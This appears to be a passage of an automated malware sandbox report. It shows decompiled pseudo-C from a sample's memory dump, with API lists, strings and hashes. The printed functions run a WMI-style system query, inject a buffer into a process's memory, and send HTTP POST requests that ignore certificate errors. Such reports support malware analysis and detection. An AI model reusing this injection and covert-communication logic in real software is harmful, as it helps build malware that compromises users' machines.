				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E00E5D52E(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00E585EA(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E00E58600( &_v60, 0xfffffffe);
					E00E5D5E2( &_v104);
					return _t320;
				}
				_t165 = E00E595C7(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E00E595C7(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E00E592CB(_t165);
				_v60 = _t322;
				E00E585BB( &_v52);
				E00E585BB( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E00E595C7(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E00E585BB( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E00E58600( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E00E591C9(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E00E591C9(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00E5867E(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00E585EA( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E00E58600(_t136, 0);
								E00E58600( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E00E591C9(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E00E595C7(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E00E595C7(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00E585EA(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E00E585BB( &_v92);
											E00E585BB( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00E59626();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00E585EA(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E00E595C7(_t283, 0x219);
										E00E59626( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E00E585BB( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E00E591C9(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E00E5DA2B( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E00E58600( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x00e5db50
0x00e5db56
0x00e5db5d
0x00e5db60
0x00e5db63
0x00e5db68
0x00e5db6a
0x00e5db6f
0x00e5dfb7
0x00e5dfb7
0x00e5db7c
0x00e5db7e
0x00e5db81
0x00e5db84
0x00e5df9c
0x00e5dfa2
0x00e5dfac
0x00000000
0x00e5dfb1
0x00e5db8f
0x00e5db96
0x00e5db9d
0x00e5dba0
0x00e5dba5
0x00e5dba7
0x00e5dbaa
0x00e5dbad
0x00e5dbae
0x00e5dbb7
0x00e5dbbd
0x00e5dbc0
0x00e5dbc9
0x00e5dbce
0x00e5dbd3
0x00e5dbea
0x00e5dbf7
0x00e5dbfa
0x00e5dc01
0x00e5dc06
0x00e5dc0d
0x00e5dc12
0x00e5dc19
0x00e5dc1b
0x00e5dc27
0x00e5dc2a
0x00e5dc2c
0x00e5df8c
0x00e5df8d
0x00e5df96
0x00000000
0x00e5df96
0x00e5dc32
0x00e5dc35
0x00e5dc38
0x00e5dc3b
0x00e5dc3d
0x00e5df58
0x00e5df5b
0x00e5df5e
0x00e5df60
0x00e5df82
0x00e5df87
0x00e5df62
0x00e5df65
0x00e5df70
0x00e5df77
0x00e5df77
0x00000000
0x00000000
0x00000000
0x00000000
0x00e5dc43
0x00e5dc43
0x00e5dc55
0x00e5dc58
0x00e5dc5a
0x00000000
0x00000000
0x00e5dc62
0x00e5dc65
0x00e5dc68
0x00e5dc6b
0x00e5dc6e
0x00e5dc71
0x00000000
0x00000000
0x00e5dc77
0x00e5dc85
0x00e5dc88
0x00e5dc8a
0x00e5dca3
0x00e5dcb2
0x00e5dcba
0x00e5dcba
0x00e5dcbd
0x00e5dcc4
0x00e5dcc8
0x00e5dcce
0x00e5dcd0
0x00e5df40
0x00e5df46
0x00e5df4c
0x00e5df4f
0x00e5df4f
0x00000000
0x00e5df4f
0x00e5dcdf
0x00e5dcf3
0x00e5dcf7
0x00e5dcf9
0x00e5dcfe
0x00e5df0d
0x00e5df13
0x00e5df1e
0x00e5df29
0x00e5df2f
0x00e5df35
0x00e5df38
0x00000000
0x00e5df38
0x00e5dd04
0x00e5dedb
0x00e5dedb
0x00e5dede
0x00e5dee1
0x00000000
0x00000000
0x00e5dd0c
0x00e5dd14
0x00e5dd1b
0x00e5dd21
0x00e5dd23
0x00000000
0x00000000
0x00e5dd2c
0x00e5dd41
0x00e5dd47
0x00e5dd50
0x00e5dd53
0x00e5dd56
0x00e5dd58
0x00e5dece
0x00e5ded1
0x00e5deda
0x00e5deda
0x00000000
0x00e5deda
0x00e5dd68
0x00e5dd6b
0x00e5dd72
0x00e5dd78
0x00e5dd7b
0x00e5dd7e
0x00e5dd81
0x00e5dd84
0x00e5ddc0
0x00e5ddc0
0x00e5ddc3
0x00e5de6f
0x00e5de83
0x00e5de93
0x00e5de97
0x00e5de99
0x00e5deb0
0x00e5deb4
0x00e5debd
0x00e5dec8
0x00000000
0x00e5dec8
0x00e5de9f
0x00e5dea0
0x00e5dea5
0x00e5dea5
0x00e5dea7
0x00e5dea8
0x00e5dead
0x00000000
0x00e5dead
0x00e5ddc9
0x00e5ddc9
0x00e5ddcc
0x00e5de37
0x00e5de4b
0x00e5de5b
0x00e5de5f
0x00e5de61
0x00000000
0x00000000
0x00e5de67
0x00e5de68
0x00000000
0x00e5de68
0x00e5ddce
0x00e5ddce
0x00e5ddd1
0x00000000
0x00000000
0x00e5ddd3
0x00e5ddd6
0x00000000
0x00000000
0x00e5ddd8
0x00e5ddd8
0x00e5ddde
0x00e5ddfa
0x00e5de09
0x00e5de12
0x00e5de17
0x00e5de1a
0x00e5de20
0x00e5de20
0x00e5de25
0x00e5de31
0x00000000
0x00e5de31
0x00e5dde3
0x00000000
0x00e5dde3
0x00e5dd86
0x00e5ddad
0x00e5ddb2
0x00e5ddb7
0x00e5ddb9
0x00e5ddb9
0x00000000
0x00e5ddb7
0x00e5dd88
0x00e5dd88
0x00e5dd8b
0x00000000
0x00000000
0x00e5dd91
0x00e5dd91
0x00e5dd94
0x00000000
0x00000000
0x00e5dd9a
0x00e5dd9a
0x00e5dd9d
0x00000000
0x00000000
0x00e5dda3
0x00e5dda6
0x00000000
0x00000000
0x00e5dda8
0x00000000
0x00e5dda8
0x00e5deea
0x00e5def0
0x00e5def6
0x00e5def9
0x00e5defc
0x00e5defc
0x00e5deff
0x00e5df00
0x00e5df03
0x00e5df05
0x00000000
0x00000000
0x00e5df55
0x00e5df55
0x00000000
0x00e5df55
0x00e5dc8c
0x00e5dc92
0x00000000
0x00e5dc92
0x00e5df52
0x00000000
0x00e5dbd5
0x00e5dbda
0x00e5dbdf
0x00000000
0x00e5dbe3

APIs

Part of subcall function 00E5D52E: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D541
Part of subcall function 00E5D52E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D552
Part of subcall function 00E5D52E: CoCreateInstance.OLE32(00E6B840,00000000,00000001,00E6B850,?,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D569
Part of subcall function 00E5D52E: SysAllocString.OLEAUT32(00000000), ref: 00E5D574
Part of subcall function 00E5D52E: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D59F

Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

SysAllocString.OLEAUT32(00000000), ref: 00E5DBF0
SysAllocString.OLEAUT32(00000000), ref: 00E5DC04
SysFreeString.OLEAUT32(?), ref: 00E5DF8D
SysFreeString.OLEAUT32(?), ref: 00E5DF96

Part of subcall function 00E58600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00E56020), ref: 00E58646

Strings

TRUE, xrefs: 00E5DDB2
FALSE, xrefs: 00E5DDB9

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: 01324e7683dd64bd24ea8eccb90f2fcb5d6adeb45f11a67750baea2302c7d2b1
Instruction ID: 0013a94485d77bb02ced71d365a5174c2c9eaf15ab6d75ea9e838a9667b432a9
Opcode Fuzzy Hash: 01324e7683dd64bd24ea8eccb90f2fcb5d6adeb45f11a67750baea2302c7d2b1
Instruction Fuzzy Hash: 14E18E71E04219EFDB14DFA4CD85AEEBBB9FF08301F105959E906BB291DB70A909CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E5C6CB, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00E5C6CB(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0xe6e688; // 0xe80000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E00E5E249(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0xe6e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0xe6e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0xe6e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0xe6e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0xe6e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0xe6e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00E5864F( *0xe6e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0xe6e684; // 0x510f6c8
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0xe6e684; // 0x510f6c8
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E00E58600( &_v32, 0x1ac4);
					_t141 =  *0xe6e688; // 0xe80000
					 *0xe6e688 = _t131;
					E00E586C7(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E00E5C64A(_v12, _v8, _v36);
					 *0xe6e688 = _t141;
					goto L14;
				}
			}

0x00e5c6d1
0x00e5c6d8
0x00e5c6da
0x00e5c6dc
0x00e5c6de
0x00e5c6e1
0x00e5c6e4
0x00e5c6e7
0x00e5c6ea
0x00e5c6ed
0x00e5c6f0
0x00e5c6fa
0x00e5c6fd
0x00e5c704
0x00e5c709
0x00e5c709
0x00e5c70f
0x00e5c711
0x00e5c71a
0x00e5c8c0
0x00e5c8c4
0x00e5c8c9
0x00e5c8cf
0x00e5c8d2
0x00e5c8d2
0x00e5c8d6
0x00e5c8db
0x00e5c8e0
0x00e5c8ed
0x00e5c8ed
0x00e5c8f6
0x00e5c8f8
0x00e5c900
0x00e5c900
0x00e5c907
0x00e5c907
0x00e5c723
0x00e5c724
0x00e5c729
0x00e5c72f
0x00e5c731
0x00e5c732
0x00e5c733
0x00e5c738
0x00e5c739
0x00e5c743
0x00000000
0x00000000
0x00e5c74e
0x00e5c758
0x00e5c762
0x00e5c765
0x00e5c76b
0x00e5c772
0x00e5c773
0x00e5c774
0x00e5c77d
0x00e5c77e
0x00e5c77f
0x00e5c781
0x00e5c784
0x00e5c787
0x00e5c78a
0x00e5c78d
0x00e5c799
0x00e5c7bb
0x00e5c7c3
0x00e5c7c6
0x00e5c7d1
0x00e5c7d1
0x00e5c7c3
0x00e5c7d7
0x00e5c7e0
0x00e5c7e2
0x00e5c7e3
0x00e5c7e5
0x00e5c7e6
0x00e5c7e7
0x00e5c7e8
0x00e5c7ec
0x00e5c7f3
0x00e5c7f4
0x00e5c7fc
0x00e5c8bd
0x00000000
0x00e5c802
0x00e5c802
0x00e5c804
0x00e5c805
0x00e5c80a
0x00e5c80b
0x00e5c80c
0x00e5c80d
0x00e5c80e
0x00e5c814
0x00e5c815
0x00e5c81a
0x00e5c81b
0x00e5c823
0x00000000
0x00000000
0x00e5c839
0x00e5c83b
0x00e5c842
0x00000000
0x00000000
0x00e5c853
0x00e5c859
0x00e5c861
0x00e5c864
0x00e5c86a
0x00e5c87a
0x00e5c886
0x00e5c88b
0x00e5c891
0x00e5c8a1
0x00e5c8ad
0x00e5c8b5
0x00000000
0x00e5c8b5

APIs

RegisterClassExA.USER32(00000030), ref: 00E5C790
CreateWindowExA.USER32 ref: 00E5C7BB
DestroyWindow.USER32(00000000), ref: 00E5C7C6
UnregisterClassA.USER32 ref: 00E5C7D1
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00E5C7ED
GetCurrentProcess.KERNEL32(00000000), ref: 00E5C8E6

Part of subcall function 00E58600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00E56020), ref: 00E58646

Strings

cdcdwqwqwq, xrefs: 00E5C775
sadccdcdsasa, xrefs: 00E5C749
0, xrefs: 00E5C758

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 3082384575-2319545179
Opcode ID: 917125f3963f69fdff5b35e160d332fb98ec00277f56ad64d3765d23496b7cc0
Instruction ID: 4640b99b81f3d500a727ac5b39a45636510f17b3efae7dcbc3277e4fe369c164
Opcode Fuzzy Hash: 917125f3963f69fdff5b35e160d332fb98ec00277f56ad64d3765d23496b7cc0
Instruction Fuzzy Hash: 73715375900209AFDB14CF95DD48EAFBBB8FB48751F200569F501B7290D7B0AA08CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00E5E673, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E5E673(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E00E595AD(0x85b);
				_v60 = E00E595AD(0xdc9);
				_v56 = E00E595AD(0x65d);
				_v52 = E00E595AD(0xdd3);
				_t105 = E00E595AD(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E00E5C384(_t214));
				_t113 =  *0xe6e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0xe6e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0xe6e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0xe6e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0xe6e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0xe6e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0xe6e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0xe6e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E00E597F2(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0xe6e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E00E597F2(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E00E595AD(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0xe6e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E00E5C384(_t217), _a4, _a8);
										E00E585A8( &_v12);
										if(_a24 != 0) {
											E00E597F2(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0xe6e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00E5972F( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0xe6e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0xe6e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0xe6e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0xe6e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0xe6e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0xe6e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0xe6e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0xe6e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x00e5e67c
0x00e5e68e
0x00e5e697
0x00e5e6a1
0x00e5e6a5
0x00e5e6b6
0x00e5e6cd
0x00e5e6da
0x00e5e6e7
0x00e5e6f4
0x00e5e6f7
0x00e5e6fc
0x00e5e701
0x00e5e703
0x00e5e70b
0x00e5e716
0x00e5e71d
0x00e5e729
0x00e5e72c
0x00e5e73a
0x00e5e73d
0x00e5e743
0x00e5e744
0x00e5e746
0x00e5e74f
0x00e5e750
0x00e5e755
0x00e5e75b
0x00e5e765
0x00e5e767
0x00e5e76c
0x00e5e76c
0x00e5e77b
0x00e5e78a
0x00e5e78e
0x00e5e79d
0x00e5e7a0
0x00e5e7a5
0x00e5e7a9
0x00e5e7b0
0x00e5e7b7
0x00e5e7bf
0x00e5e7c7
0x00e5e7ce
0x00e5e7d6
0x00e5e7de
0x00e5e7e5
0x00e5e7ed
0x00e5e7f5
